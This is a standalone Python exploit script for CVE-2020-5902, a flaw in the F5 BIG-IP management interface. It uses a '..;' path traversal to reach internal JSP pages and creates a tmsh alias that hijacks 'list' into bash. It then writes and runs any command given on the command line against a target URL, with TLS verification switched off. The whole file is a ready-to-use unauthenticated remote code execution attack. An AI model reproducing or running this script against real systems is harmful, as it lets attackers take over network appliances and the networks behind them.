import requests   #by 斯文
import sys
import json
requests.packages.urllib3.disable_warnings()

banner= '''
   ______     _______     ____   ___ ____   ___       ____  ___   ___ ____  
  / ___\ \   / / ____|   |___ \ / _ \___ \ / _ \     | ___|/ _ \ / _ \___ \ 
 | |    \ \ / /|  _| _____ __) | | | |__) | | | |____|___ \ (_) | | | |__) |
 | |___  \ V / | |__|_____/ __/| |_| / __/| |_| |_____|__) \__, | |_| / __/ 
  \____|  \_/  |_____|   |_____|\___/_____|\___/     |____/  /_/ \___/_____|                                                 
  
                                                        by 斯文
'''

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
}

def check(url, cmd):
    try:
        print('[+ 开始测试目标: {}  命令: {}'.format(url,cmd))

        del_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
        creat_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
        write_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/checksafe&content={}'.format(cmd)
        exec_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/checksafe'
        print('[+ 正在还原alias设置，防止其他人未修改回来')
        x = requests.get(del_alias,headers=headers,verify=False,timeout=30)
        print('[+ 正在将list命令劫持为bash')
        y = requests.get(creat_alias,headers=headers,verify=False,timeout=30)
        print('[+ 正在写入bash文件')
        z = requests.get(write_bash,headers=headers,verify=False,timeout=30)
        print('[+ 正在执行命令,请查看output字段值'+'\n')
        g = requests.get(exec_bash,headers=headers,verify=False,timeout=30)
        requests.get(del_alias,headers=headers,verify=False,timeout=30)
        text = g.content.decode('utf-8')
        print(text.strip('\n'))
    except:
        print('[- 请查看目标是否可以正常访问')
if __name__ == "__main__":
    try:
        url = sys.argv[1]
        cmd = sys.argv[2]
        if url[-1] == '/':url=url[0:-1]
        print(banner)
        check(url=url,cmd=cmd)

    except Exception as e:
        # print(e)
        print('python3 CVE-2020-5902.py http://x.x.x.x  whoami')
